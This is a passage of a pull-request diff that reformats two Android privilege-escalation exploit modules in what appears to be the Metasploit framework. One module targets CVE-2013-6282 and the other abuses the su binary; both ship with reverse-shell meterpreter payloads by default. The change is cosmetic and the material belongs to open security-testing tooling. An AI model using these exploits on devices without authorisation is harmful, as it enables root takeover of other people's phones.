-            allow an unprivileged user to read and write kernel memory.
-            This exploit first reads the kernel memory to identify the commit_creds and
-            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
-            The exploit was first discovered in the wild in the vroot rooting application.
-          },
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'fi01', # libget_user_exploit / libput_user_exploit
-            'cubeundcube', # kallsyms_in_memory
-            'timwr',       # Metasploit module
-          ],
-          'References' => [
-            [ 'CVE', '2013-6282' ],
-            [ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
-            [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
-            [ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
-          ],
-          'DisclosureDate' => '2013-09-06',
-          'SessionTypes' => [ 'meterpreter' ],
-          "Platform" => [ "android", "linux" ],
-          'Targets' => [[ 'Automatic', {}]],
-          'Payload' => { 'Space' => 2048, },
-          'DefaultOptions' => {
-            'WfsDelay' => 120,
-            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
-          },
-          'DefaultTarget' => 0,
-          'Compat' => {
-            'Meterpreter' => {
-              'Commands' => %w[
-                core_loadlib
-                stdapi_fs_delete_file
-                stdapi_fs_getwd
-              ]
-            }
-          },
+        'Name' => 'Android get_user/put_user Exploit',
+        'Description' => %q{
+          This module exploits a missing check in the get_user and put_user API functions
+          in the linux kernel before 3.5.5. The missing checks on these functions
+          allow an unprivileged user to read and write kernel memory.
+          This exploit first reads the kernel memory to identify the commit_creds and
+          ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
+          The exploit was first discovered in the wild in the vroot rooting application.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'fi01', # libget_user_exploit / libput_user_exploit
+          'cubeundcube', # kallsyms_in_memory
+          'timwr',       # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2013-6282' ],
+          [ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
+          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
+          [ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
+        ],
+        'DisclosureDate' => '2013-09-06',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Platform' => [ 'android', 'linux' ],
+        'Targets' => [[ 'Automatic', {}]],
+        'Payload' => { 'Space' => 2048 },
+        'DefaultOptions' => {
+          'WfsDelay' => 120,
+          'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+        },
+        'DefaultTarget' => 0,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              core_loadlib
+              stdapi_fs_delete_file
+              stdapi_fs_getwd
+            ]
+          }
+        },
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
         }
       )
     )
   end
 
   def exploit
-    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-6282.so")
+    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-6282.so')
     exploit_data = File.read(local_file, mode: 'rb')
 
     space = payload_space
@@ -70,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Local
     exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
 
     workingdir = session.fs.dir.getwd
-    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
+    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
     write_file(remote_file, exploit_data)
 
     print_status("Loading exploit library #{remote_file}")

--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -10,43 +10,52 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Post::Android::Priv
 
-  def initialize(info={})
-    super( update_info( info, {
-      'Name'           => "Android 'su' Privilege Escalation",
-      'Description'    => %q{
-          This module uses the su binary present on rooted devices to run
-          a payload as root.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => "Android 'su' Privilege Escalation",
+          'Description' => %q{
+            This module uses the su binary present on rooted devices to run
+            a payload as root.
 
-          A rooted Android device will contain a su binary (often linked with
-          an application) that allows the user to run commands as root.
-          This module will use the su binary to execute a command stager
-          as root. The command stager will write a payload binary to a
-          temporary directory, make it executable, execute it in the background,
-          and finally delete the executable.
+            A rooted Android device will contain a su binary (often linked with
+            an application) that allows the user to run commands as root.
+            This module will use the su binary to execute a command stager
+            as root. The command stager will write a payload binary to a
+            temporary directory, make it executable, execute it in the background,
+            and finally delete the executable.
 
-          On most devices the su binary will pop-up a prompt on the device
-          asking the user for permission.
-      },
-      'Author'         => 'timwr',
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2017-08-31',
-      'SessionTypes'   => [ 'meterpreter', 'shell' ],
-      'Platform'       => [ 'android', 'linux' ],
-      'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
-      'Targets'        => [
-        ['aarch64',{'Arch' => ARCH_AARCH64}],
-        ['armle',  {'Arch' => ARCH_ARMLE}],
-        ['x86',    {'Arch' => ARCH_X86}],
-        ['x64',    {'Arch' => ARCH_X64}],
-        ['mipsle', {'Arch' => ARCH_MIPSLE}]
-      ],
-      'DefaultOptions' => {
-        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
-        'WfsDelay' => 5,
-      },
-      'DefaultTarget'  => 0,
-      }
-    ))
+            On most devices the su binary will pop-up a prompt on the device
+            asking the user for permission.
+          },
+          'Author' => 'timwr',
+          'License' => MSF_LICENSE,
+          'DisclosureDate' => '2017-08-31',
+          'SessionTypes' => [ 'meterpreter', 'shell' ],
+          'Platform' => [ 'android', 'linux' ],
+          'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
+          'Targets' => [
+            ['aarch64', { 'Arch' => ARCH_AARCH64 }],
+            ['armle', { 'Arch' => ARCH_ARMLE }],
+            ['x86', { 'Arch' => ARCH_X86 }],
+            ['x64', { 'Arch' => ARCH_X64 }],
+            ['mipsle', { 'Arch' => ARCH_MIPSLE }]
+          ],
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+            'WfsDelay' => 5
+          },
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'SideEffects' => [ ARTIFACTS_ON_DISK ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SAFE ]
+          }
+        }
+      )
+    )
     register_options([
       OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
       OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
@@ -63,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     if is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges'
+      fail_with(Failure::BadConfig, 'Session already has root privileges')
     end
 
     linemax = 4088 - su_bin.size
@@ -73,14 +82,11 @@ class MetasploitModule < Msf::Exploit::Local
       prefix: '\\\\0',
       temp: base_dir,
       linemax: linemax,
-      background: true,
+      background: true
     })
   end
 
-  def execute_command(cmd, opts)
-    su_cmd = "#{su_bin} -c '#{cmd}'"
-    cmd_exec(su_cmd)
+  def execute_command(cmd, _opts)
+    cmd_exec("#{su_bin} -c '#{cmd}'")
   end
-
 end
-


### PR DESCRIPTION
Most violations were resolved with `rubocop -A`, except notes.

* Also updates a few reference URLs.
* Some `check` methods were updated to use the new `CheckCode` message format.

